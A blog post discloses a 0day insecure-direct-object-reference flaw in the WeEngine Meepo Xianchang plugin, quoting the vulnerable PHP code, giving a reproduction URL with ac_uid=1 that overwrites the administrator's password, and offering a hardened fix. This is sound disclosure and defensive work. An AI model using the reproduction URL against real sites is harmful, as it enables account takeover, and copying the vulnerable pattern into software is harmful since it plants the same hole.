UU Blog

WeEngine (微擎) plugin Meepo Xianchang (米波现场): arbitrary account password change vulnerability (0day)

Root cause

The WeEngine Meepo Xianchang plugin lets any logged-in user change the password of any other account.

  • meepo_xianchang/inc/web/account_manage.inc.php

Lines 143-193: in the change-password function available to an ordinary logged-in user, the target uid (ac_uid) is read from the request rather than from the session. Passing another user's UID changes that user's password instead of the caller's own. This is a missing authorization check on a client-supplied object identifier (an insecure direct object reference): the only thing separating a low-privilege user from any account, the administrator's included, is a guessable integer.

```php
elseif ($op == 'account_mima') {
    load()->model('user');
    // The target account comes straight from the request ($_GPC merges GET, POST
    // and COOKIE in WeEngine); nothing ties it to the logged-in user.
    $account_uid = intval($_GPC['ac_uid']);
    if (empty($account_uid)) {
        web_message('错误'); // "error"
    }
    $account_user = user_single($account_uid);
    if (empty($account_user)) {
        web_message('用户不存在或是已经被删除!', referer(), 'error'); // "user does not exist or has been deleted"
    }
    if (checksubmit('user_submit')) {
        $record = array();
        if (!empty($account_user['username'])) {
            $record['username'] = $account_user['username'];
        }
        if (!empty($_GPC['password'])) {
            $password = trim($_GPC['password']);
            // The new password is hashed with the target user's existing salt.
            $record['password'] = user_hash($password, $account_user['salt']);
        } else {
            // The message promises an 8-character minimum, but no length check is made.
            web_message('必须输入新密码,且密码长度不少于8位。'); // "a new password of at least 8 characters is required"
        }
        // Every remaining column is copied back unchanged from the row just read.
        if (!empty($account_user['lastvisit'])) {
            $record['lastvisit'] = (strlen($account_user['lastvisit']) == 10) ? $account_user['lastvisit'] : strtotime($account_user['lastvisit']);
        }
        if (!empty($account_user['lastip'])) {
            $record['lastip'] = $account_user['lastip'];
        }
        if (isset($account_user['joinip'])) {
            $record['joinip'] = $account_user['joinip'];
        }
        if (isset($account_user['remark'])) {
            $record['remark'] = $account_user['remark'];
        }
        if (isset($account_user['type'])) {
            $record['type'] = $account_user['type'];
        }
        if (isset($account_user['status'])) {
            $status = intval($account_user['status']);
            $record['status'] = $status;
        }
        if (isset($account_user['groupid'])) {
            $record['groupid'] = $account_user['groupid'];
        }
        if (isset($account_user['starttime'])) {
            $record['starttime'] = $account_user['starttime'];
        }
        if (isset($account_user['endtime'])) {
            $record['endtime'] = $account_user['endtime'];
        }
        // The row updated is whichever uid the client put in ac_uid.
        pdo_update('users', $record, array('uid' => $account_uid));
        web_message('密码修改成功!', referer(), 'success'); // "password changed successfully"
    }
} // closing brace of the branch; the quoted excerpt stops just before it
```

Reproduction

Passing ac_uid=1 targets the administrator account. Any logged-in user who opens the URL below is served the change-password form for that uid; submitting it with a new password (the POST carrying password and the user_submit field that checksubmit('user_submit') looks for) overwrites the administrator's password.

/web/index.php?c=site&a=entry&ac_uid=1&op=account_mima&do=account_manage&m=meepo_xianchang

Fix

Take the target uid from the logged-in user's session instead of accepting it from the request. Any other branch of account_manage.inc.php that reads ac_uid from $_GPC needs the same treatment: an identifier supplied by the client must never be the thing that selects whose record gets written.
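A hardened version of the account_mima branch, added here as an example; it is not the plugin author's patch. It keeps the WeEngine helpers the original snippet uses (load(), user_single(), checksubmit(), user_hash(), pdo_update(), referer(), and web_message(), which ends the request) and assumes two things the post does not show: that the current login is available as $_W['uid'], WeEngine's global for the logged-in user's uid, and that the user_single() row carries the stored hash in $account_user['password']. It goes one step beyond the post's fix by also requiring the current password (a hypothetical old_password form field) and enforcing the 8-character minimum the original message only claimed. It is written as an if so that it parses on its own; in the file it is the elseif branch shown above.

```php
<?php
// Added example: hardened replacement for the 'account_mima' branch of
// meepo_xianchang/inc/web/account_manage.inc.php. Not the plugin's own code.
// Assumptions: $_W['uid'] holds the logged-in user's uid, user_single() returns
// the stored hash as $account_user['password'], and the form posts an
// old_password field alongside password and user_submit.
if ($op == 'account_mima') {
    load()->model('user');

    // The target account is the caller's own session identity, never a request value.
    $account_uid = intval($_W['uid']);
    if (empty($account_uid)) {
        web_message('Please log in first.', referer(), 'error');
    }

    // Defence in depth: an ac_uid that still arrives (stale form, tampered
    // request) must match the session, otherwise the attempt is logged and refused.
    if (isset($_GPC['ac_uid']) && intval($_GPC['ac_uid']) !== $account_uid) {
        error_log(sprintf('account_mima: uid %d tried to change the password of uid %d',
            $account_uid, intval($_GPC['ac_uid'])));
        web_message('You may only change your own password.', referer(), 'error');
    }

    $account_user = user_single($account_uid);
    if (empty($account_user)) {
        web_message('User does not exist or has been deleted.', referer(), 'error');
    }

    if (checksubmit('user_submit')) {
        $password     = isset($_GPC['password']) ? trim($_GPC['password']) : '';
        $old_password = isset($_GPC['old_password']) ? trim($_GPC['old_password']) : '';

        // Enforce the minimum length the original message promised but never checked.
        if (strlen($password) < 8) {
            web_message('A new password of at least 8 characters is required.', referer(), 'error');
        }

        // Prove possession of the current password before rotating it, so a
        // hijacked session cannot silently lock the real owner out. hash_equals()
        // compares in constant time.
        $expected = user_hash($old_password, $account_user['salt']);
        if (!hash_equals($account_user['password'], $expected)) {
            web_message('Current password is incorrect.', referer(), 'error');
        }

        // Write only the column that changes; the original re-copied every other
        // column from the row it had just read.
        $record = array('password' => user_hash($password, $account_user['salt']));
        pdo_update('users', $record, array('uid' => $account_uid));
        web_message('Password changed.', referer(), 'success');
    }
}
```

With the uid bound to the session, the ac_uid parameter in the reproduction URL no longer selects the victim; it is either ignored or, if it disagrees with the session, rejected and logged, which also gives the site operator a signal that someone is probing the endpoint.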
